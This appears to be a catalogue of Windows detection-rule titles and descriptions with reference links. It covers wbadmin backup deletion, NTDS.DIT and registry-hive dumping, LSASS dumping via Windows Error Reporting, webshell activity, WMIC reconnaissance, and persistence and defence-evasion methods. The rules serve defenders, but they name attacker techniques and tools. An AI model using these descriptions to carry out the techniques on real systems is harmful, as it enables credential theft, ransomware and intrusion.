All Backups Deleted Via Wbadmin.EXE Detects the deletion of all backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup
Windows Backup Deleted Via Wbadmin.EXE Detects the deletion of backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup
Sensitive File Dump Via Wbadmin.EXE Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup
File Recovery From Backup Via Wbadmin.EXE Detects the recovery of files from backups via "wbadmin.exe". Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/
Sensitive File Recovery From Backup Via Wbadmin.EXE Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup
Potentially Suspicious WebDAV LNK Execution Detects possible execution via LNK file accessed on a WebDAV server. https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462
Chopper Webshell Process Pattern Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
Webshell Hacking Activity Patterns Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system https://youtu.be/7aemGhaE9ds?t=641
Webshell Detection With Command Line Keywords Detects certain command line parameters often used during reconnaissance activity via web shells https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html, https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/, https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild
Suspicious Process By Web Server Process Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
Potential Credential Dumping Via WER Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
Webshell Tool Reconnaissance Activity Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html
Potential ReflectDebugger Content Execution Via WerFault.EXE Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html, https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/
Suspicious Child Process Of Wermgr.EXE Detects suspicious Windows Error Reporting manager (wermgr.exe) child process https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html, https://www.echotrail.io/insights/search/wermgr.exe, https://github.com/binderlabs/DirCreate2System
Suspicious Execution Location Of Wermgr.EXE Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html, https://www.echotrail.io/insights/search/wermgr.exe, https://github.com/binderlabs/DirCreate2System
Suspicious File Download From IP Via Wget.EXE Detects potentially suspicious file downloads directly from IP addresses using Wget.exe https://www.gnu.org/software/wget/manual/wget.html
Suspicious File Download From File Sharing Domain Via Wget.EXE Detects potentially suspicious file downloads from file sharing domains using wget.exe https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
Suspicious File Download From IP Via Wget.EXE - Paths Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe https://www.gnu.org/software/wget/manual/wget.html
Suspicious Where Execution Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md
Enumerate All Information With Whoami.EXE Detects the execution of "whoami.exe" with the "/all" flag https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s
Whoami Utility Execution Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
Whoami.EXE Execution From Privileged Process Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/
Group Membership Reconnaissance Via Whoami.EXE Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
Whoami.EXE Execution With Output Option Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s
Whoami.EXE Execution Anomaly Detects the execution of whoami.exe with suspicious parent processes. https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s
Security Privileges Enumeration Via Whoami.EXE Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
Suspicious WindowsTerminal Child Processes Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) https://persistence-info.github.io/Data/windowsterminalprofile.html, https://twitter.com/nas_bench/status/1550836225652686848
Add New Download Source To Winget Detects usage of winget to add new additional download sources https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Add Insecure Download Source To Winget Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Add Potential Suspicious New Download Source To Winget Detects usage of winget to add new potentially suspicious download sources https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Install New Package Via Winget Local Manifest Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later. https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install, https://lolbas-project.github.io/lolbas/Binaries/Winget/, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Winrar Compressing Dump Files Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
Potentially Suspicious Child Process Of WinRAR.EXE Detects potentially suspicious child processes of WinRAR.exe. https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
Winrar Execution in Non-Standard Folder Detects a suspicious winrar execution in a folder which is not the default installation folder https://twitter.com/cyb3rops/status/1460978167628406785
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
Remote Code Execute via Winrm.vbs Detects an attempt to execute code or create service on remote host via winrm.vbs. https://twitter.com/bohops/status/994405551751815170, https://redcanary.com/blog/lateral-movement-winrm-wmi/, https://lolbas-project.github.io/lolbas/Scripts/Winrm/
Remote PowerShell Session Host Process (WinRM) Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
Suspicious Processes Spawned by WinRM Detects suspicious processes including shells spawnd from WinRM host process Internal Research
Compress Data and Lock With Password for Exfiltration With WINZIP An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
Wlrmdr.EXE Uncommon Argument Or Child Process Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry. https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ, https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/
New ActiveScriptEventConsumer Created Via Wmic.EXE Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence https://twitter.com/johnlatwc/status/1408062131321270282?s=12, https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
Potential Windows Defender Tampering Via Wmic.EXE Detects potential tampering with Windows Defender settings such as adding exclusion using wmic https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md, https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/, https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/
New Process Created Via Wmic.EXE Detects new process creation using WMIC via the "process call create" flag https://www.sans.org/blog/wmic-for-incident-response/, https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process
Computer System Reconnaissance Via Wmic.EXE Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
Local Groups Reconnaissance Via Wmic.EXE Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
Hardware Model Reconnaissance Via Wmic.EXE Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/, https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks
Windows Hotfix Updates Reconnaissance Via Wmic.EXE Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat, https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
Process Reconnaissance Via Wmic.EXE Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
Potential Product Reconnaissance Via Wmic.EXE Detects the execution of WMIC in order to get a list of firewall and antivirus products https://thedfirreport.com/2023/03/06/2022-year-in-review/, https://www.yeahhub.com/list-installed-programs-version-path-windows/, https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product
Potential Product Class Reconnaissance Via Wmic.EXE Detects the execution of WMIC in order to get a list of firewall and antivirus products https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md, https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1
Service Reconnaissance Via Wmic.EXE An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
Uncommon System Information Discovery Via Wmic.EXE Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023. https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic, https://nwgat.ninja/getting-system-information-with-wmic-on-windows/, https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar, https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/, https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/, https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior
Potential Unquoted Service Path Reconnaissance Via Wmic.EXE Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py, https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
System Disk And Volume Reconnaissance Via Wmic.EXE An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the `wmic` command-line utility and has been observed being used by threat actors such as Volt Typhoon. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
WMIC Remote Command Execution Detects the execution of WMIC to query information on a remote system https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
Service Started/Stopped Via Wmic.EXE Detects usage of wmic to start or stop a service https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
Potential SquiblyTwo Technique Execution Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html, https://twitter.com/mattifestation/status/986280382042595328, https://atomicredteam.io/defense-evasion/T1220/, https://lolbas-project.github.io/lolbas/Binaries/Wmic/
Suspicious WMIC Execution Via Office Process Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Suspicious Process Created Via Wmic.EXE Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc. https://thedfirreport.com/2020/10/08/ryuks-return/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
Application Terminated Via Wmic.EXE Detects calls to the "terminate" function via wmic in order to kill an application https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/, https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf
Application Removed Via Wmic.EXE Detects the removal or uninstallation of an application via "Wmic.EXE". https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic
Potential Tampering With Security Products Via WMIC Detects uninstallation or termination of security products using the WMIC utility https://twitter.com/cglyer/status/1355171195654709249, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html
XSL Script Execution Via WMIC.EXE Detects the execution of WMIC with the "format" flag to potentially load XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md
WmiPrvSE Spawned A Process Detects WmiPrvSE spawning a process https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html
Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI. https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e
Suspicious WmiPrvSE Child Process Detects suspicious and uncommon child processes of WmiPrvSE https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/, https://twitter.com/ForensicITGuy/status/1334734244120309760
WMI Backdoor Exchange Transport Agent Detects a WMI backdoor in Exchange Transport Agents via WMI event filters https://twitter.com/cglyer/status/1182389676876980224, https://twitter.com/cglyer/status/1182391019633029120
WMI Persistence - Script Event Consumer Detects WMI script event consumers https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
UEFI Persistence Via Wpbbin - ProcessCreation Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c, https://persistence-info.github.io/Data/wpbbin.html
Potential Dropper Script Execution Via WScript/CScript Detects wscript/cscript executions of scripts located in user directories https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://redcanary.com/blog/gootloader/
Cscript/Wscript Potentially Suspicious Child Process Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. Internal Research, https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt, https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_22.12.2023.txt
Cscript/Wscript Uncommon Script Extension Execution Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension Internal Research
WSL Child Process Anomaly Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/, https://twitter.com/nas_bench/status/1535431474429808642
Windows Binary Executed From WSL Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships Internal Research
Proxy Execution Via Wuauclt.EXE Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. https://dtm.uk/wuauclt/, https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
Suspicious Windows Update Agent Empty Cmdline Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags https://redcanary.com/blog/blackbyte-ransomware/
Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths. https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://www.echotrail.io/insights/search/wusa.exe/
Wusa.EXE Executed By Parent Process Located In Suspicious Location Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges. https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document
Xwizard.EXE Execution From Non-Default Location Detects the execution of Xwizard tool from a non-default directory. When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll". https://lolbas-project.github.io/lolbas/Binaries/Xwizard/, http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
COM Object Execution via Xwizard.EXE Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. This utility can be abused in order to run custom COM object created in the registry. https://lolbas-project.github.io/lolbas/Binaries/Xwizard/, https://www.elastic.co/guide/en/security/current/execution-of-com-object-via-xwizard.html, https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
Potential Process Hollowing Activity Detects when a memory process image does not match the disk image, indicative of process hollowing. https://twitter.com/SecurePeacock/status/1486054048390332423?s=20, https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/
Potential Defense Evasion Via Raw Disk Access By Uncommon Tools Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Potential NetWire RAT Activity - Registry Detects registry keys related to NetWire RAT https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing, https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/, https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/, https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line, https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
Potential Persistence Via New AMSI Providers - Registry Detects when an attacker registers a new AMSI provider in order to achieve persistence https://persistence-info.github.io/Data/amsi.html, https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c
Potential COM Object Hijacking Via TreatAs Subkey - Registry Detects COM object hijacking via TreatAs subkey https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
Potential Persistence Via Disk Cleanup Handler - Registry Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. https://persistence-info.github.io/Data/diskcleanuphandler.html, https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/
Potential Persistence Via Logon Scripts - Registry Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md
PUA - Sysinternal Tool Execution - Registry Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key https://twitter.com/Moti_B/status/1008587936735035392
Suspicious Execution Of Renamed Sysinternals Tools - Registry Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) Internal Research
PUA - Sysinternals Tools Execution - Registry Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key. https://twitter.com/Moti_B/status/1008587936735035392
Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis
Folder Removed From Exploit Guard ProtectedFolders List - Registry Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/
